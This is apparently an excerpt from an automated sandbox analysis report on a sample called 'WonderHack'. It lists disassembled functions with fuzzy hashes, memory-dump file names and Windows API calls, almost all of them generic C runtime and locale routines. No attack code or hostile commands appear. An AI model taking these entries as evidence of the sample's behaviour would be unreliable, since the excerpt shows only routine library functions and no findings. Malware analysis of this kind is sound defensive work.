• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: d676128023a921de9be0a29ae6fce7b82496ef1c00b094a389781c8d89009909
• Instruction ID: 05ecac3f3fb589389bfa860be47916e127ba66ee3a0a5a1faf378c49de7da805
• Opcode Fuzzy Hash: d676128023a921de9be0a29ae6fce7b82496ef1c00b094a389781c8d89009909
• Instruction Fuzzy Hash: 06B1B17090060B8FCB298FA8C9556BEBBB1AF0731CF144A1ED4A297A91C7319F41DB53
APIs
  • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
  • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
• EnumSystemLocalesW.KERNEL32(00CB86CB,00000001,00000000,?,-00000050,?,00CB84BB,00000000,-00000002,00000000,?,00000055,?), ref: 00CB86A2
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 5a9c0875e66c389b71869700378bf748a890c0958c855f8f5b0646c36c729493
• Instruction ID: f57fcc653939ad8708f596f4128d262629f0b5ff89fce596c97042430a2b0f83
• Opcode Fuzzy Hash: 5a9c0875e66c389b71869700378bf748a890c0958c855f8f5b0646c36c729493
• Instruction Fuzzy Hash: E911253A2007019FDB189F39C8916FABB95FF80328F19443CE94787A40E771AA46CB40
APIs
  • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
  • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB8AF1
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: fe76e617ea5b47aed5eb9da05873fa0e3be4ed7c666425f555ba951b7898682a
• Instruction ID: b429e0ae5279e8094a9bf3b5cda3fe40d4393c007c56586132f0cd7ef4f640ad
• Opcode Fuzzy Hash: fe76e617ea5b47aed5eb9da05873fa0e3be4ed7c666425f555ba951b7898682a
• Instruction Fuzzy Hash: 8A11A372611506ABDB149F28DC42AFA7BECEF05310F10407AE506D7281EF74EE04DB90
APIs
  • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
  • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00CB88E7,00000000,00000000,?), ref: 00CB8C76
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ErrorLast$InfoLocale
• String ID:
• API String ID: 3736152602-0
• Opcode ID: 373aca1e78b2cfd96e2c4956ba26ec7723cf797e1274001779b6cc00c5ead3fa
• Instruction ID: 72d2ec10c184a4a9b0f0e8bf9f74b8520a6f2f66508da4fdf7cbb77a9eb0b1c2
• Opcode Fuzzy Hash: 373aca1e78b2cfd96e2c4956ba26ec7723cf797e1274001779b6cc00c5ead3fa
• Instruction Fuzzy Hash: BB01D672B00516ABDB285B658806BFA3B6CDB40754F154429EC56A3180EE74EE45D6E0
APIs
  • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
  • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
• EnumSystemLocalesW.KERNEL32(00CB897D,00000001,?,?,-00000050,?,00CB8483,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00CB8968
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 504d6d8006736dc947a035fd792400c343e344e613f99e528e4da1798ab51221
• Instruction ID: a91b6854f1b980df4ba4def0a9596079840d98fd959b7cb2e66f89c5627148fd
• Opcode Fuzzy Hash: 504d6d8006736dc947a035fd792400c343e344e613f99e528e4da1798ab51221
• Instruction Fuzzy Hash: 5AF022366003045FCF245F34AC81ABABB99EF80368F04442DFA424B690CBB29D42D640
APIs
  • Part of subcall function 00CAF547: EnterCriticalSection.KERNEL32(?,?,00CACD41,00000000,00CCE728,0000000C,00CACCFA,00001000,?,00CB44CA,00001000,?,00CB35B1,00000001,00000364,?), ref: 00CAF556
• EnumSystemLocalesW.KERNEL32(00CB439A,00000001,00CCEBA0,0000000C,00CB3DA8,-00000050), ref: 00CB43DF
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID:
• API String ID: 1272433827-0
• Opcode ID: 9881f91d4f2fde38af279cf591ac8eab92de5b17aeb0493cec497a3cebcf0354
• Instruction ID: e85f39d3cd03f958fe968e6d0d0d5e1c4a2bc7b4840ca0b3cc9daf9b5c5113e6
• Opcode Fuzzy Hash: 9881f91d4f2fde38af279cf591ac8eab92de5b17aeb0493cec497a3cebcf0354
• Instruction Fuzzy Hash: 57F03232A41205DFDB04EF98E842B9D7BF0EB09725F10416AF511DB2A1DB755940EF90
APIs
  • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
  • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
• EnumSystemLocalesW.KERNEL32(00CB8A9D,00000001,?,?,?,00CB84DD,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00CB8A89
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ErrorLast$EnumLocalesSystem
• String ID:
• API String ID: 2417226690-0
• Opcode ID: 7f43a70edf38c219a6d606207a581f32db44dbdd284d0e6b4f6fdfe87cb8eac9
• Instruction ID: 0c6308c8bc9279439312ad6f1ef6f4f91312191d00fa8698ba53596e2c2af48b
• Opcode Fuzzy Hash: 7f43a70edf38c219a6d606207a581f32db44dbdd284d0e6b4f6fdfe87cb8eac9
• Instruction Fuzzy Hash: 02F02B3630030557CB149F75EC45BAABF98EFC1724F0A406AEB168B290CA71DA86E790
APIs
• GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00CAE2A3,?,20001004,00000000,00000002,?,?,00CAD1B5), ref: 00CB3EE0
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                          • Opcode ID: 97a2a1d9390168833e30bb13a8b30580d13b3bf731d5accd3dedc8bed01749b8
                                                                                                                                                                                                                                                                          • Instruction ID: ab29c7c82870ba287a429d2db1ab9dd39efb12d2f13159d9599d0afe2d03a945
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97a2a1d9390168833e30bb13a8b30580d13b3bf731d5accd3dedc8bed01749b8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5E04F31504168BBCF226F61DC04FEE3E66EF447A0F044421FD16661A1CB36CA20BAD5
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001663D), ref: 00CA6521
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6b6766383acd2878f4920309f9c6f565c1178b2277445d3d8da3fe04b0e620c5
                                                                                                                                                                                                                                                                          • Instruction ID: ae79f2ed509b575c822acde852661b711e12529ece3c8de084daa974c79e01da
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b6766383acd2878f4920309f9c6f565c1178b2277445d3d8da3fe04b0e620c5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                                                          • Opcode ID: 504137259432b8d7213b59965a83ba99af86107ba9c7715475e2a2e6900c48f9
                                                                                                                                                                                                                                                                          • Instruction ID: e865f645e4dc02dfb2be90844ee47f99c8d8a8b95182d956667c3bf876f6ca38
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 504137259432b8d7213b59965a83ba99af86107ba9c7715475e2a2e6900c48f9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28A001746032058BA7548F35AB0A71D3AADAA9A691705406EA50AC5170EB39A451AA01
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 41b83c2ca3de056dfcd879212a9cbca79c38de6be81e499b0d8859161e080eee
                                                                                                                                                                                                                                                                          • Instruction ID: e5796efa2471ba2136c02968c650b7e011c83e18a2448cad9c93ff7777c346ac
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41b83c2ca3de056dfcd879212a9cbca79c38de6be81e499b0d8859161e080eee
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D05179B4D0020E9FCF40DFA8D596AEEBBF4AB09350F24545AE815FB310D734AA41CBA5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a31fc2ec69f4fb4ab37674a276921e4a8761421fb0ab044740df4e6e2dea759c
• Instruction ID: 8e3dee7b08d06271cfcca3d96e8d6f801256775d9d44d250ed33198f4cbebef5
• Opcode Fuzzy Hash: a31fc2ec69f4fb4ab37674a276921e4a8761421fb0ab044740df4e6e2dea759c
• Instruction Fuzzy Hash: C0D06C3A641A58AFC210CF8AE440E41F7A8FB89670B158066EA0993B20D235F811CEE0

APIs
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: __freea$__alloca_probe_16$Info
• String ID:
• API String ID: 127012223-0
• Opcode ID: 77f5f5fedec21017400d8b78638b40a644ce5e305bcc3cafdfc137131e6b4039
• Instruction ID: a8e0d08877bb06f5074c0d0773a3205a02fa899fdc6ab858cbbd762f0da4bbf7
• Opcode Fuzzy Hash: 77f5f5fedec21017400d8b78638b40a644ce5e305bcc3cafdfc137131e6b4039
• Instruction Fuzzy Hash: 1671D572900249ABEF219E94CC41FAF7BBA9F46310F2D405EEA24A7292D735DE41D760

APIs
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00CA6AB0
• __alloca_probe_16.LIBCMT ref: 00CA6ADC
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00CA6B1B
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CA6B38
• LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CA6B77
• __alloca_probe_16.LIBCMT ref: 00CA6B94
• LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00CA6BD6
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00CA6BF9
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: ByteCharMultiStringWide$__alloca_probe_16
• String ID:
• API String ID: 2040435927-0
• Opcode ID: 5b34bb505e1889d5c86595bb03a3b6a7ca9c7d7ceaa1bcd94c6a1ce3aa47a9ad
• Instruction ID: b7be9adda4dc27538fdd1e9c0295adc40ed1911ae1f8d0a9c87c66c7ce536fa3
• Opcode Fuzzy Hash: 5b34bb505e1889d5c86595bb03a3b6a7ca9c7d7ceaa1bcd94c6a1ce3aa47a9ad
• Instruction Fuzzy Hash: 5651C07250021BAFEB215F60CC45FAB7BA9EF42758F294024F965E6190DB34CE00DBA0

APIs
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Opcode ID: c3ed0d376608a570b3b521b077c8efc077dfbec983f27d761b9b7f2e2db3b283
• Instruction ID: f6f6bc058c12dca107fe5675ad845bc3dd5a188f07aa252c7664272107313192
• Opcode Fuzzy Hash: c3ed0d376608a570b3b521b077c8efc077dfbec983f27d761b9b7f2e2db3b283
• Instruction Fuzzy Hash: C8B14872A013559FEB11CF68CC82BEEBFA5EF55310F184165E915AF282D278DE01CBA1

APIs
• _ValidateLocalCookies.LIBCMT ref: 00CA7977
• ___except_validate_context_record.LIBVCRUNTIME ref: 00CA797F
• _ValidateLocalCookies.LIBCMT ref: 00CA7A08
• __IsNonwritableInCurrentImage.LIBCMT ref: 00CA7A33
• _ValidateLocalCookies.LIBCMT ref: 00CA7A88
Strings
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 06052fc65e2a72dc4955c65b17dde0779f03448452133aefca71d6be2c9b8136
• Instruction ID: e158f5b1b20e50a0ef8e4057a83636fbe76421c2bcca0a7bf23284bfa2aa0f52
• Opcode Fuzzy Hash: 06052fc65e2a72dc4955c65b17dde0779f03448452133aefca71d6be2c9b8136
• Instruction Fuzzy Hash: B241C630A0421AABCF10DF68CC85A9E7BB5BF46318F148656E8259B352D731AF41DB91
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00CA6CC1
• GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00CA6CCF
• GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00CA6CE0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
• API String ID: 667068680-1047828073
• Opcode ID: 841e0f7ef5d23229aeebbc9187fe9b6df0b103e41257cbbe7d1ddc2286e2dec7
• Instruction ID: 2283c84a61df78d3d306585efdf2d6ce1b01a186be84557ac83f16680a42a691
• Opcode Fuzzy Hash: 841e0f7ef5d23229aeebbc9187fe9b6df0b103e41257cbbe7d1ddc2286e2dec7
• Instruction Fuzzy Hash: BBD0C7795563146B83105FF5FC0DF5D3BA4EB09712305007EFC06D3290D6B458418F92
Memory Dump Source
• Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
• Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmp
